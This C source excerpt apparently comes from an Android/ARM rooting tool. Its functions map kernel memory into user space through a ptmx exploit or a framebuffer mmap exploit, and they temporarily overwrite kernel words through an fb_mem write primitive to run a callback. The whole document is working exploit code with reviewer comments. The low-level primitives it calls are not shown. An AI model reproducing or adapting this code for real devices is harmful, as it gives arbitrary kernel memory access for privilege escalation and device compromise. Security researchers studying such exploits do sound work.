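/*
 * Map kernel memory into user space through the framebuffer mmap path and
 * hand the mapping to callback_func.
 *
 * When get_kernel_physical_offset() yields a non-zero offset, the fb_mem
 * physical offset is rebased to (offset - 0x8000) first. 0x8000 looks like
 * the ARM kernel TEXT_OFFSET (kernel image placed 0x8000 above the RAM base)
 * -- TODO confirm against fb_mem_set_kernel_phys_offset's contract.
 *
 * callback_func receives the address fb_mem_convert_to_mmaped_address()
 * derives for PAGE_OFFSET inside the new mapping, KERNEL_SIZE bytes and
 * callback_param. The mapping is torn down before this function returns, so
 * the callback must not retain the pointer.
 *
 * Returns false when no mapping could be established, otherwise the
 * callback's result.
 *
 * fb_mem_mmap()'s failure sentinel is not visible from here: this function
 * tested MAP_FAILED while map_kernel_memory() treats NULL as failure. Both
 * are rejected so that neither NULL nor (void *)-1 is ever handed to the
 * callback or to fb_mem_munmap().
 */
static bool
attempt_mmap_fb_mem_exploit(exploit_memory_callback_t callback_func, void *callback_param)
{
  unsigned long int phys_offset = get_kernel_physical_offset();
  int fd = -1;
  void *mapped;
  bool result;

  if (phys_offset) {
    fb_mem_set_kernel_phys_offset(phys_offset - 0x00008000);
  }

  mapped = fb_mem_mmap(&fd);
  if (mapped == NULL || mapped == MAP_FAILED) {
    return false;
  }

  result = callback_func(fb_mem_convert_to_mmaped_address((void *)PAGE_OFFSET, mapped),
                         KERNEL_SIZE, callback_param);

  /* Drop the user-space window over kernel memory as soon as the callback
   * is done; fb_mem_munmap() gets the fd that fb_mem_mmap() filled in. */
  fb_mem_munmap(mapped, fd);

  return result;
}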
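/*
 * Establish a user-space mapping of kernel memory, trying the ptmx exploit
 * first and the framebuffer mmap exploit second.
 *
 * Globals written:
 *   kernel_physical_offset  filled in by setup_variables() when still zero
 *   kernel_mapped_address   user-space address corresponding to the kernel
 *                           base: PTMX_MEMORY_MAPPED_ADDRESS on the ptmx path,
 *                           or the address fb_mem_convert_to_mmaped_address()
 *                           derives for KERNEL_BASE_ADDRESS on the fb path
 *   fb_mmap_fd              fd of the fb mapping, -1 when the ptmx path was
 *                           used or nothing was mapped
 *   fb_mem_mmap_base        base of the fb mapping; untouched on the ptmx
 *                           path, NULL when the fb path failed
 *
 * Returns false when setup_variables() failed or neither exploit produced a
 * mapping. On failure kernel_mapped_address is left at
 * PTMX_MEMORY_MAPPED_ADDRESS and must not be used.
 */
bool
map_kernel_memory(void)
{
  if (!kernel_physical_offset && !setup_variables()) {
    return false;
  }

  fb_mmap_fd = -1;
  kernel_mapped_address = PTMX_MEMORY_MAPPED_ADDRESS;

  if (ptmx_map_memory(PTMX_MEMORY_MAPPED_ADDRESS, kernel_physical_offset, KERNEL_MEMORY_SIZE)) {
    return true;
  }

  /* 0x8000 looks like the ARM kernel TEXT_OFFSET (image placed 0x8000 above
   * the RAM base) -- TODO confirm against fb_mem_set_kernel_phys_offset(). */
  fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x8000);

  printf("Attempt fb_mem_exploit...\n");
  fb_mem_mmap_base = fb_mem_mmap(&fb_mmap_fd);

  /* fb_mem_mmap()'s failure sentinel is not visible from here:
   * attempt_mmap_fb_mem_exploit() checks MAP_FAILED while this function
   * checked NULL. Reject both rather than let (void *)-1 be treated as a
   * live mapping and converted into kernel_mapped_address. */
  if (fb_mem_mmap_base == NULL || fb_mem_mmap_base == MAP_FAILED) {
    fb_mem_mmap_base = NULL;
    /* NOTE(review): assumes fb_mem_mmap() closed its fd on failure --
     * otherwise this drops the descriptor; confirm against fb_mem_mmap(). */
    fb_mmap_fd = -1;
    return false;
  }

  kernel_mapped_address =
    (unsigned long int)fb_mem_convert_to_mmaped_address((void *)KERNEL_BASE_ADDRESS,
                                                        fb_mem_mmap_base);

  return true;
}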
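/*
 * Run one callback with a single kernel word temporarily patched through the
 * framebuffer mmap write primitive.
 *
 * address        kernel address to patch
 * write_value    value placed at address before the callback runs
 * restore_value  value written back after the callback
 * info           passed through to run_callback()
 *
 * When get_kernel_physical_offset() yields a non-zero offset, the fb_mem
 * physical offset is rebased to (offset - 0x8000) first; 0x8000 looks like
 * the ARM kernel TEXT_OFFSET -- TODO confirm against
 * fb_mem_set_kernel_phys_offset().
 *
 * Returns true when the patch was written (and the callback therefore ran);
 * false when the initial write failed, in which case nothing was touched.
 *
 * The restore write is best-effort: its failure is reported on stdout but
 * does not change the return value, because the callback has already run.
 * A failed restore leaves the kernel word holding write_value, so a caller
 * that can verify the word afterwards should do so.
 */
static bool
attempt_fb_mem_exploit(unsigned long int address, unsigned long int write_value,
                       unsigned long int restore_value, callback_info_t *info)
{
  unsigned long int phys_offset = get_kernel_physical_offset();

  if (phys_offset) {
    fb_mem_set_kernel_phys_offset(phys_offset - 0x00008000);
  }

  if (!fb_mem_write_value_at_address(address, write_value)) {
    return false;
  }

  run_callback(info);

  if (!fb_mem_write_value_at_address(address, restore_value)) {
    /* The original value was not put back; report it instead of silently
     * dropping the result, since the kernel is now left modified. */
    printf("Failed to restore 0x%lx at 0x%lx\n", restore_value, address);
  }

  return true;
}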